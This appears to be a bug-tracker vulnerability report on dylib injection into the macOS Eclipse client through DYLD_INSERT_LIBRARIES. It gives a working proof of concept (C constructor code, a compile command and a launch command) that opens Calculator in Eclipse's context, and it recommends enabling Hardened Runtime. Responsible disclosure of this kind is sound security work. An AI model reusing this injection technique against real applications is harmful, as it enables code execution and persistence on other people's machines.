Community
Participate
Working Groups
Created attachment 283904 [details] POC of vulnerability execution Vulnerability description There is a code injection vulnerability in your macOS desktop client. Any malicious application, running with standard user permissions is able to exploit this vulnerability and execute code in your application's context. Requirements In order to exploit this vulnerability, a victim has to have a malicious dylib on the device. Proof of Concept / Steps to reproduce: To display the impact I've prepared a proof of concept where malicious user without root permissions opens a calculator from Eclipse's context. 1. Create a new dylib with following contents: #include <stdio.h> #include <stdlib.h> #include <syslog.h> __attribute__((constructor)) static void customConstructor(int argc, const char **argv) { printf("Hello from dylib!\n"); syslog(LOG_ERR, "Dylib injection successful in %s\n", argv[0]); system("open -a Calculator"); } 2. Compile it using gcc gcc -dynamiclib evil.c -o evil.dylib 3. Inject to the Eclipse binary DYLD_INSERT_LIBRARIES=evil.dylib /Applications/Eclipse.app/Contents/MacOS/eclipse 4. Calculator should be run in Eclipse's context Impact In the proof of concept I showed that any malicious dylib is able to execute code in Eclipse's context. This can easily aide a malicious user a method of persistence to maintain access to the compromised machine. Recommendations Assuming that the desktop client has been compiled using XCode, a developer needs to turn on "Hardened Runtime" capability making sure that Allow DYLD Environment Variables option is turned off.
additional information: https://theevilbit.github.io/posts/dyld_insert_libraries_dylib_injection_in_macos_osx_deep_dive/